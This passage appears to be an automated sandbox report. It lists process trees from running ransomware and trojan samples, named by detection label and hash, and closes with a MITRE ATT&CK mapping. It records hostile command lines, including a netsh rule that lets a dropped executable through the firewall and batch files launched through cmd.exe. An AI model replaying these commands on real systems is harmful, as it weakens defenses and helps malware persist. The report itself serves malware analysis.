        "C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Stop.gen-f205ae05f0212e1b0f4328dde8202d00ccd26b250d8b90dd64cbc00505c75ea1.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        
        PID:1392
      - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Stop.gen-f205ae05f0212e1b0f4328dde8202d00ccd26b250d8b90dd64cbc00505c75ea1.exe
        
        "C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Stop.gen-f205ae05f0212e1b0f4328dde8202d00ccd26b250d8b90dd64cbc00505c75ea1.exe" --Admin IsNotAutoStart IsNotTask
        6⤵
        
        PID:6752
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan.MSIL.Crypt.gen-a2810ebd7d04a16167a8d78e26316505c1f8da521e25074b02ae0d0d873a8230.exe
    HEUR-Trojan.MSIL.Crypt.gen-a2810ebd7d04a16167a8d78e26316505c1f8da521e25074b02ae0d0d873a8230.exe
    3⤵
    PID:2736
  - - C:\Users\Admin\AppData\Local\Temp\csgo.exe
      "C:\Users\Admin\AppData\Local\Temp\csgo.exe"
      4⤵
      PID:1928
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\csgo.exe" "csgo.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:7872
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan.MSIL.Crypt.gen-b46b5657118ecb66cbe08afc47ee7a58d8d6ad5ded89e62a423c6d00c39d0c12.exe
    HEUR-Trojan.MSIL.Crypt.gen-b46b5657118ecb66cbe08afc47ee7a58d8d6ad5ded89e62a423c6d00c39d0c12.exe
    3⤵
    PID:9076
  - - C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
      "C:\Users\Admin\AppData\Local\Temp\\InstallUtil.exe"
      4⤵
      PID:8896
  - - C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
      "C:\Users\Admin\AppData\Local\Temp\\InstallUtil.exe"
      4⤵
      PID:7000
  - - C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
      "C:\Users\Admin\AppData\Local\Temp\\InstallUtil.exe"
      4⤵
      PID:2416
  - - C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
      "C:\Users\Admin\AppData\Local\Temp\\InstallUtil.exe"
      4⤵
      PID:7808
  - - C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
      "C:\Users\Admin\AppData\Local\Temp\\InstallUtil.exe"
      4⤵
      PID:2428
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan.MSIL.Crypt.gen-c535d4d07de34a85033b0df08ce1b73683edd76e777e9dedc549472c91aa219c.exe
    HEUR-Trojan.MSIL.Crypt.gen-c535d4d07de34a85033b0df08ce1b73683edd76e777e9dedc549472c91aa219c.exe
    3⤵
    PID:7576
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan.MSIL.Crypt.gen-ca866449a03b4c9c85530dd631904f4d4bb16b96bf3ce69fa833111e4bb1f4c9.exe
    HEUR-Trojan.MSIL.Crypt.gen-ca866449a03b4c9c85530dd631904f4d4bb16b96bf3ce69fa833111e4bb1f4c9.exe
    3⤵
    PID:3820
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      4⤵
      PID:6060
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:7236
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:1620
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan.MSIL.Crypt.gen-e1f48f8a51b4d8f665f04f2201d67f1ebba80fffd765b00e832d3f683a5a30d7.exe
    HEUR-Trojan.MSIL.Crypt.gen-e1f48f8a51b4d8f665f04f2201d67f1ebba80fffd765b00e832d3f683a5a30d7.exe
    3⤵
    PID:7064
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan.MSIL.Crypt.gen-ed6316c4494521cabfafc2fdd9268d1e9eb9933611c8053e3bbd2d4e0e9b855f.exe
    HEUR-Trojan.MSIL.Crypt.gen-ed6316c4494521cabfafc2fdd9268d1e9eb9933611c8053e3bbd2d4e0e9b855f.exe
    3⤵
    PID:2672
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
      dw20.exe -x -s 924
      4⤵
      PID:7468
- - C:\Users\Admin\Desktop\00464\Trojan-Ransom.Win32.Blocker.kgw-aac1a21b41d4cea628d6f226da86916e4942a0e68c211ca6c4ad41e6e67c9830.exe
    Trojan-Ransom.Win32.Blocker.kgw-aac1a21b41d4cea628d6f226da86916e4942a0e68c211ca6c4ad41e6e67c9830.exe
    3⤵
    PID:2276
- - C:\Users\Admin\Desktop\00464\Trojan-Ransom.Win32.Crypmodng.jj-69dbf19199ecc66bf1855b084d7a935b3756411d2ffced6c38cfc7033b1625c6.exe
    Trojan-Ransom.Win32.Crypmodng.jj-69dbf19199ecc66bf1855b084d7a935b3756411d2ffced6c38cfc7033b1625c6.exe
    3⤵
    PID:4772
  - - C:\Users\Admin\Desktop\00464\Trojan-Ransom.Win32.Crypmodng.jj-69dbf19199ecc66bf1855b084d7a935b3756411d2ffced6c38cfc7033b1625c6.exe
      Trojan-Ransom.Win32.Crypmodng.jj-69dbf19199ecc66bf1855b084d7a935b3756411d2ffced6c38cfc7033b1625c6.exe
      4⤵
      PID:8516
- - C:\Users\Admin\Desktop\00464\Trojan-Ransom.Win32.Cryptodef.aoo-e2ff6b8f2b5eabb16f51141dac2b7835fcb5d6afc4d29c9b84c40f836aa7d153.exe
    Trojan-Ransom.Win32.Cryptodef.aoo-e2ff6b8f2b5eabb16f51141dac2b7835fcb5d6afc4d29c9b84c40f836aa7d153.exe
    3⤵
    PID:272
  - - C:\Users\Admin\AppData\Local\Temp\wujek.exe
      "C:\Users\Admin\AppData\Local\Temp\wujek.exe"
      4⤵
      PID:4244
- - C:\Users\Admin\Desktop\00464\Trojan-Ransom.Win32.GandCrypt.oc-af88baa9c5ac00f0449cae5fea3f0b62b0140d032855e0190d0b9906271d4f63.exe
    Trojan-Ransom.Win32.GandCrypt.oc-af88baa9c5ac00f0449cae5fea3f0b62b0140d032855e0190d0b9906271d4f63.exe
    3⤵
    PID:6828
- - C:\Users\Admin\Desktop\00464\Trojan-Ransom.Win32.GenericCryptor.cys-849701ace2d82ac5642dbc0816136149747284af29df2ab2c7e62c05292a735e.exe
    Trojan-Ransom.Win32.GenericCryptor.cys-849701ace2d82ac5642dbc0816136149747284af29df2ab2c7e62c05292a735e.exe
    3⤵
    PID:5832
  - - C:\Users\Admin\AppData\Local\Temp\mytis.exe
      "C:\Users\Admin\AppData\Local\Temp\mytis.exe"
      4⤵
      PID:8576
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\_uinsey.bat" "
      4⤵
      PID:7748
- - C:\Users\Admin\Desktop\00464\Trojan-Ransom.Win32.GenericCryptor.czo-606371a4651a00ded616c5214a2faf104ed6910363b31144c976cff0b89919d1.exe
    Trojan-Ransom.Win32.GenericCryptor.czo-606371a4651a00ded616c5214a2faf104ed6910363b31144c976cff0b89919d1.exe
    3⤵
    PID:4504
  - - C:\Users\Admin\AppData\Local\Temp\mytis.exe
      "C:\Users\Admin\AppData\Local\Temp\mytis.exe"
      4⤵
      PID:5244
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sanfdr.bat" "
      4⤵
      PID:8356

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2004
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /1
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3524 -ip 3524
1⤵
PID:1976

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2004

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
PID:5768

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:7840

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
PID:7940

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\01020be3031849d2ad71cd2951137ed9 /t 4984 /p 8780
1⤵
PID:8452

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
PID:6868

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:7440

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
PID:5416

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6372

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\bbc2260dc0a94392a1ecc01fcbfdf808 /t 6992 /p 6152
1⤵
PID:4288

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa388f855 /state1:0x41c64e6d
1⤵
PID:7464

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Direct Volume Access

T1006

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Proxy

T1090

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery